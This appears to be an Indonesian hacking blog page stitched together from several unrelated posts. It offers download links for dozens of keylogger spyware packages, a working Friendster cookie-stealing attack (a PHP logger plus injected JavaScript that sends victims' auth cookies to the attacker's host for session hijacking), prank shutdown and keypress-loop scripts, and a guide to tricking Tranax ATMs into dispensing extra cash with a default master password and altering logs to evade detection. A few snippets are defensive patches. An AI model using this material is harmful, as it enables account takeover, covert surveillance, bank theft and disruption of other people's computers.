Berikut daftarnya :
1. 007 Keylogger Spy Software 3.873
2. Active Key Logger 2.4
3. Activity Keylogger 1.80.21
4. Activity Logger 3.7.2132
5. ActMon Computer Monitoring 5.20
6. Actual Spy 2.8
7. Advanced Invisible Keylogger v1.9
8. Advanced Keylogger 1.8
9. Ardamax Keylogger 2.9
10. BlazingTools Perfect Keylogger 1.68
11. Blazingtools Remote Logger v2.3
12. Data Doctor KeyLogger Advance v3.0.1.5
13. Local Keylogger Pro 3.1
14. ExploreAnywhere Keylogger Pro 1.7.8
15. Family Cyber Alert 4.06
16. Family Keylogger 2.80
17. Firewall bypass Keylogger 1.5
18. Free Keylogger 2.53
19. Ghost Keylogger 3.80
20. Golden Eye 4.5
21. Golden KeyLogger 1.32
22. Handy Keylogger 3.24 build 032
23. Home Keylogger 1.77
24. Inside Keylogger 4.1
25. iOpus Starr PC and Internet Monitor 3.23
26. iSpyNow v2.0
27. KeyScrambler 1.3.2
28. Keystroke Spy 1.10
29. KGB Keylogger 4.2
30. KGB Spy 3.84
31. LastBit Absolute Key Logger 2.5.283
32. Metakodix Stealth Keylogger 1.1.0
33. Network Event Viewer v6.0.0.42
34. OverSpy v2.5
35. PC Activity Monitor Professional 7.6.3
36. PC Spy Keylogger 2.3 build 0313
37. PC Weasel 2.5
38. Personal PC Spy v1.9.5
39. Power Spy 6.10
40. Powered Keylogger v2.2.1.1920
41. Quick Keylogger 2.1
42. Radar 1.0
43. Real Spy Monitor 2.80
44. Real Spy Monitor 2.80
45. Remote Desktop Spy 4.04
46. Remote KeyLogger 1.0.1
47. Revealer Keylogger Free 1.33
48. SC Keylogger Pro 3.2
49. Smart Keystroke Recorder Pro
50. Spector Pro 6.0.1201
51. SpyAnytime PC Spy 2.42
52. SpyBuddy 3.7.5
53. Spytech SpyAgent 6.02.07
54. Spytector 1.3.5
55 Stealth Key Logger 4.5
56. System keylogger 2.0.0
57. Tim’s Keylogger 1.0
58. Tiny Keylogger 2.0
59. Total Spy 2.7
60. Windows Keylogger 5.04
61. Win-Spy Pro 8.9.109
62. XP Advanced Keylogger 2.5
63. XPCSpy Pro version 3.01

download disini
http://rapidshare.com/files/191921436/A … .part1.rar
http://rapidshare.com/files/191921441/A … .part2.rar

This summary is not available. Please click here to view the post.

Patch Token pada Joomla


[code]##
##
## Mod title: Tokenize [at] Joomla
##
## Source: too many to spell
## Works on joomla: 1.*
## Release date: unknown
##
##


#
#---------[ 1. OPEN ]---------------------------------------------------
#

/components/com_user/models/reset.php


#
#---------[ 5. FIND (line:112) ]---------------------------------------------------
#

function confirmReset($token)
{
global $mainframe;



#
#---------[ 6. AFTER, ADD ]---------------------------------------------------
#

if(strlen($token) != 32) {
$this->setError(JText::_('Ur Warning Message here'));
return false;

Anti Shutdown Auto

nah..klo misalnya udah kena itu..
cepet2 buka cmd..
lalu tulis ini..kemudian ENTER
[Code]

shutdown -a
[/code]
heheh..selesai deh.. ^_^
gak jadi deh kompi'a mati..

patch (SQL INJECTION ) pada ASP di halaman login admin

[code]
Function Amankan(strtemp)
strTemp = Replace(strTemp, "(", "[")
strTemp = Replace(strTemp, ")", "]")
strTemp = Replace(strTemp, chr(13), "")
strTemp = Replace(strTemp, chr(34), "'")
strTemp = Replace(strTemp, "<" , "<")
strTemp = Replace(strTemp, ">" , ">")
strTemp = Replace(strTemp, "script" , "s-c-r-i-p-t")
strTemp = Replace(strTemp, "=" , "samadengan")

Amankan = strTemp
End Function

Function Amankan1(strtemp)
strTemp = Replace(strTemp, "(", "")
strTemp = Replace(strTemp, ")", "")
strTemp = Replace(strTemp, chr(13), "")
strTemp = Replace(strTemp, chr(34), "")
strTemp = Replace(strTemp, "<" , "")
strTemp = Replace(strTemp, ">" , "")
strTemp = Replace(strTemp, "script" , "s-c-r-i-p-t")
strTemp = Replace(strTemp, ";" , "")
strTemp = Replace(strTemp, "'" , "")
strTemp = Replace(strTemp, "having" , "")


Amankan1 = strTemp
End Function



Function ChkEmail(strTemp)
If Len(strTemp) > 0 Then
If InStr(1, strTemp, "@") > 0 Then
If InStr(Len(strTemp) - 4, strTemp, ".") > 0 Then
ChkEmail = True
End If
End If
Else
ChkEmail = False
End If
End Function

Function ChkMessage(strTemp)
If Len(strTemp) > 20 and Len(strTemp) < 200 Then
ChkMessage = True
Else
ChkMessage = False
End IF
End Function

Function ChkName(strTemp)
If Len(strTemp) > 4 and Len(strTemp) < 30 Then
ChkName = True
Else
ChkName = False
End IF
End Function


persyaratannya:

1.Punya Browser Mozzilla Firefox Dengan Add-On Cookie Editor!!
Kalo Belom Punya Klik https://addons.mozilla.org/en-US/firefox/addon/573

2.Webhosting Untuk Penyimpanan Cookies Dan Code!!
Example: ripway.com

3.Punya Account FriendSter Tentunya!!

Langkah-Langkahnya adalah:

1.Buat File PHP dengan nama cook.php, (bisa buat di notepad ajah, tapi save dengan SAVE AS TYPE-nya All Files dan simpan dengan nama cook.php).
isinya :

Code:

$cookie=$_GET['c'];
$id=$_GET['s'];
$ref=$_GET['nx'];
$pjg=strlen($cookie)<155;
$valid=strstr($cookie, "mac");
if(($valid)&&($pjg)){
//$ip = getenv ('REMOTE_ADDR');
$date=date("dmy.g:ia");
$fl = fopen('321.txt', 'a');
fwrite($fl, "\r\n$ip;;$id;;$date\r\n$cookie\r\n");
fclose($fl);
}
header("location:$ref");
?>

2.Buat File Dengan Nama kenadech.js Yang Isinya:

Code:

var userURL="id FS KALIAN";
var id=fgetCookie("friendster_identitas"),pUrl=window.location.href.search(/profiles\./),pVd=pageViewerID,pOd=pageOwnerID,pVn=pageViewerFName;

if(pVd==""){
alert("Please log in to see this profile: "+pOd);
top.location.href="http://www.friendster.com/login.php?next=%2F"+pOd+"&cookie=1";}
else{
if(pUrl>0){
if(id!=pVd){
document·cookie="friendster_identitas="+pVd+"; path=/";
top.location.href="http://www.friendster.com/profiles/"+userURL;
}}
else{
var cLoger="http://HOSTINGAN/NICKNAMEHOST/cook.php",ck=fgetCookie("friendster_auth_v2"),nxLoc="http://profiles.friendster.com/"+pOd;
window.location.href=cLoger+'?c='+escape(ck)+'&s='+escape(pVn)+'~'+pVd+'~@'+pOd+'&nx='+nxLoc;}}

4.lalu buat satu file kosong degan nama 321.txt ( HTTP://HOSTINGA/NICKHOST/321.txt
untuk melihat cookies si korban

5.pasangkan file js yang tadi kamu upload di kotak media/mediabox kamu
(http://hostingan/nickhost/kenadech.js)

kemudian apa bila cookies si korban sudah kamu dapatkan
CONTOH:

Code:

;;BLABLABLA~XXXXXX~@ID KAMU;;071008.11:57am
uid=XXXXXX&lastclick=1223398659&cty=vg&icty=-&y9p=i6h7hLlWzAN4z3gFBLAzxxahlAQiBoa5fYt7wd877zg*&mac=MTNkMTMwYmVkNTQ2Y2M0MjM0YmM1NzBiNDMwYmJlNmQ*

nah kalo sudah kamu dapatkan yang seperti ini di file kosong txt kamu
tinggal di replace aja dech di notepad

= "DEGANTI MENJADI %3D "
& "DIGANTI MENJADI %26 "
* "DIGANTI MENJADI %2A "

setelah sudah di ganti smuah
kita ke cookie editor yang tadi kita download

cari friendster_auth_V2
kemudian kamu ubah contentnya degan cookies yang tadi sudah d replace

dan kmudian reload kembali,,,,,,,


apakah yg terlihat di sana???
DEFACE...DEFACE

http://www.4shared.com/dir/5793695/e9a0cb77/CEH.html


Caranya bikin shutdown otomatis plus nampilin pesan sesuai kemauan kita.
Seperti inilah langkahnya:
Buka notepad trus kopi script dibawah ini:


@echo off
msg * kena lu ma gw
shutdown -s -c "Error! mati kompinya"


Nah kalo udah save dengan nama file .BAT
Contohnya: shutdown.bat

Skarang nih kita mo buikin vbscript yang nongool mulu ga abis abis.
Caranya seperti yang diatas yaitu:
Buka notepad trus kopi script dibawah ini:


Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Kalo udah save dengan namafile .vbs


Lets start the GAME xD~~
Hal ini hanya bekerja untuk mesin tipe Tranax Minibank 1500 Series ..


Berikut adalah cuplikan dari Manual Book :

intinya untuk masuk kedalam Operator Function pada ATM Machine tipe ini, anda perlu menekan tombol , dan secara bersamaan selama 2 detik, lepaskan mereka, dan tekan tombol 1, kemudian 2, dan 3. Mungkin timing awalnya akan susah pada saat anda mencoba pertama kali .. xD~~

Kalau kmu kesulitan untuk login ..
Cara kasarnya juga ada .. Wakakaka ..
Matikan power ATM mesin, buka saja penutup ATM, copot kertas untuk printernya, pasangkan kembali, dan pada saat anda menyalakan kembali ATM, dia akan lgsg masuk pada Operator Function ..

Susah memang ..
But no pain .. No gain right?? xD~~

Setelah masuk ke dalam Operator Function .. kamu akan ditanyai 3 jenis password, yang mana anda dapat memilih 1 dari antara 3 itu:
- Operator Password (Ini untuk meng-akses menu dasar struktur ATM)
- Service Password (Mengijinkan akses ke menu dasar dan diagnostic menu)
- Master Password (Mengijinkan anda mengakses penuh mesin tersebut)

Disini adalah kunci dari pembicaraan kita ..
Pada mesin Tranax MiniBank 1500 Series .. Default Master Password nya adalah "000000" (Tanpa kutip) .. Dan saya rasa tidak banyak yang merubah default password itu, Hehehe ..

Dari sana anda bisa melakukan banyak hal ..
Termasuk diantaranya "reset the status of the cash cartridges" .. Yang dimana membuat anda mgkn saja melakukan pengambilan uang sebesar 100rb namun anda mendapatkan 400rb karena anda membuat cashingnya menjadi 4x lipat lebih banyak .. Namun bank akan hanya me-reduce uang anda sebanyak 100rb sesuai request anda ..

Menarik bukan??!
Wakakaka ..

Bagaimana apabila kita terlacak??
Dengan Master Password, anda bisa merubah jam transaksi, merubah entire timing dan printing data ATM, dll dsb dst .. Yah, kreasikan sendiri utk bisa kabur dr tuduhan .. Jadi intinya, yang perlu anda takuti adalah .. Security Cameras


INGAT HANYA UNTUK PENGETAHUAN

bagi yang berminat praktek n succes jangan lupa bagi bagi

Newer Posts Older Posts Home